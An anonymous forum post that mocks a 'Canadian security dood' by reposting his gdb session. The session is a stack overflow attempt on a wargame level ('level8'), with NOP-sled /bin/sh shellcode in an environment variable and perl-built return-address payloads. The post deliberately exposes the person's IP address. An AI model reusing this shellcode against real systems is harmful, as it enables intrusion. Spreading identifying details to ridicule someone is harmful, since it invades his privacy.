IP address of Canadian security dood

This crazy Canadian forgot to remove his IP address out of the environment variables before he pasted his circa 1995 overflow attempt.

Posted by Anonymous on Sat 18 Jul 01:55

1. 0xbfffddeb:      "i686"
2. 0xbfffddf0:      ""
3. 0xbfffddf1:      ""
4. 0xbfffddf2:      ""
5. 0xbfffddf3:      ""
6. 0xbfffddf4:      ""
7. 0xbfffddf5:      ""
8. 0xbfffddf6:      ""
9. 0xbfffddf7:      "/levels/level8"
10. 0xbfffde06:      'A' <repeats 32 times>
11. 0xbfffde27:      'A' <repeats 13 times>, "BBBB"
12. 0xbfffde39:      "SHELLCODE=", '\220' <repeats 100 times>, "1�\215C\027�\2001�Rhn/shh//bi\211�RS\211�\v�\200"
13. 0xbfffdec6:      "SHELL=/bin/bash"
14. 0xbfffded6:      "TERM=xterm"
15. 0xbfffdee1:      "SSH_CLIENT=70.52.16.12 39289 22"
16. 0xbfffdf01:      "SSH_TTY=/dev/pts/1"
17. 0xbfffdf14:      "USER=level8"
18. 0xbfffdf20:      "COLUMNS=178"
19. 0xbfffdf2c:      "PATH=/usr/local/bin:/usr/bin:/bin:/usr/games"
20. 0xbfffdf59:      "MAIL=/var/mail/level8"
21. 0xbfffdf6f:      "_=/usr/bin/gdb"
22. 0xbfffdf7e:      "PWD=/levels"
23. 0xbfffdf8a:      "LINES=64"
24. 0xbfffdf93:      "HOME=/home/level8"
25. 0xbfffdfa5:      "SHLVL=1"
26. 0xbfffdfad:      "LOGNAME=level8"
27. 0xbfffdfbc:      "SSH_CONNECTION=70.52.16.12 39289 192.168.1.32 22"
28. 0xbfffdfed:      "/levels/level8"
29. 0xbfffdffc:      ""
30. 0xbfffdffd:      ""
31. 0xbfffdffe:      ""
32. 0xbfffdfff:      ""
33. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
34. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
35. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
36. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
37. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
38. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
39. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
40. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
41. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
42. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
43. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
44. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
45. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
46. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
47. 0xbfffe000:      <Address 0xbfffe000 out of bounds>
48. ---Type <return> to continue, or q <return> to quit---q
49. Quit
50. (gdb) quit
51. The program is running.  Exit anyway? (y or n) y
52. level8@io:/levels$ gdb level8
53. GNU gdb 6.8-debian
54. Copyright (C) 2008 Free Software Foundation, Inc.
55. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
56. This is free software: you are free to change and redistribute it.
57. There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
58. and "show warranty" for details.
59. This GDB was configured as "i486-linux-gnu"...
60. (gdb) r `perl -e 'print "A"x32 . " " . "A"x13 . "BBBB"'`
61. Starting program: /levels/level8 `perl -e 'print "A"x32 . " " . "A"x13 . "BBBB"'`
62.  
63. Program received signal SIGSEGV, Segmentation fault.
64. 0x42424242 in ?? ()
65. (gdb) r `perl -e 'print "A"x32 . " " . "A"x13 . "\x39\xde\xff\xbf"'`
66. The program being debugged has been started already.
67. Start it from the beginning? (y or n) y
68. Starting program: /levels/level8 `perl -e 'print "A"x32 . " " . "A"x13 . "\x39\xde\xff\xbf"'`
69.  
70. Program received signal SIGSEGV, Segmentation fault.
71. 0xbfffded1 in ?? ()
72. (gdb) r `perl -e 'print "A"x32 . " " . "A"x13 . "\x4d\xde\xff\xbf"'`
73. The program being debugged has been started already.
74. Start it from the beginning? (y or n) y
75. Starting program: /levels/level8 `perl -e 'print "A"x32 . " " . "A"x13 . "\x4d\xde\xff\xbf"'`
76.  
77. Program received signal SIGSEGV, Segmentation fault.
78. 0xbfffded1 in ?? ()
79. (gdb)

The pastebin: http://pastebin.com/m5e005077

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
•